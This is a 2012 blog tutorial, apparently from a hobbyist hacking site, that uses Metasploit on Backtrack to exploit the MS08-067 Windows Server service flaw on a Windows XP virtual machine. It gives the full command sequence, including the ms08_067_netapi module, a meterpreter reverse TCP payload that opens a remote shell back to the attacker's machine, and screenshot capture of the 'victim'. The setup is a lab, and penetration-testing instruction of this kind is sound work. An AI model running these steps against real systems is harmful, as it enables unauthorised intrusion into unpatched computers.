• RSS
  • Delicious
  • Digg
  • Facebook
  • Twitter
  • Linkedin
  • Increase Website And Blog Traffic:latest article for Increasing Blog and website Traffic free gide.....
  • Create and Upload Site Map to Google:Google is fist largest Search Engine by upploading SITE MAP Google Easily Search Links from Ur site in Searching.......
  • Fix WEB SITE Errors:Google and other search engines always take those site in there fist page in searching which ha too less web Errors...
  • Top 20 Search Engine:Submit Ur site to top 20 Search Engines to Increasing Ur Site Traffic and making money top search engines like as Google, Yahoo, Ask, AOl, MSN...
  • Top Social Sites:Top 100 Social sites which real help U make a Affliate Marketer and in Pormoting ur Producdts...

New Posts

Hacking Windows XP Using Backtrack

Posted by Mohsin On 12/28/2012 05:29:00 AM 1 comment


In this article i am going to demonstrate how to hack a remote computer by exploiting the  parsing flaw in the pathcanonicalization code of NetAPI32.dll through the Server Service(CVE-2008-4250). Before we jump into the actual exploitation process, let me give more details about this Server Service Vulnerability.


Details about Server Service Vulnerability(MS08-067):
 

Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.

The Server service is vulnerable to a remote code-executionvulnerability. The vulnerability is caused due to an error innetapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The 'NetprPathCanonicalize()' function in the 'netapi32.dll' file is affected.

A malicious request to vulnerable system results in complete compromise of vulnerable computers.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.


Exploiting the MS08-067 using Metasploit:

Requirements:

  •     VirtualBox

  •     Backtrack 5

  •     Target OS(XP)


Step 1:

Create Two Virtual Machine(VM) namely "Target" and "BT5".  Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.



Step 2: Find the IP address of Target

 

Open The command prompt in the Target machine(XP). Type "ipconfig" to find the IP address of the Target system.

 

Step 3: Information Gathering
 

Now let us collect some information about the Target machine.  For this purpose , we are going to use the nmap tool.

Open The Terminal in the BT5 machine(Backtrack) and type "nmap -O 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.



 Step 4: Metasploit
 

Now open the Terminal in the BT5 machine(Backtrack) and Type "msfconsole".

The msfconsole is the most popular interface to the Metasploit Framework. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Let us use the Search command to find the exploit modules with the keyword netapi. Type "search netapi".  Now you can see the list of modules match with the netapi.



We are going to exploit MS08-067 , so type "use exploit/windows/smb/ms08_067_netapi".

Step 5: Set Payload
 

As usual, let use the Reverse Tcp Payload for this exploit also. Type "set payload windows/meterpreter/reverse_tcp" in the msfconsole.

Step 6: Options
 

Type "set LHOST 192.168.56.10".  Here 192.168.56.10 is IP address of Backtrack machine.  You can find the ip address by typing 'ifconfig' command in the Terminal.

Type "set RHOST 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine.










Step 7: Exploiting
 

Ok, it is time to exploit the vulnerability, type "exploit" in the console. If the exploit is successful, you can see the following result.












Now we can control the remote computer using the meterpreter. For example, typing "screenshot" will grab the screenshot of the victim system.


I hope you understand and enjoy this...........................

1 comments:

When I initially commented I clicked the "Notify me when new comments are added" checkbox and now each time a comment
is added I get several e-mails with the same comment. Is there
any way you can remove people from that service? Thanks!

Here is my web page ... pop over to this website - redhillbbq.com -

Post a Comment

All types of Comments are welcome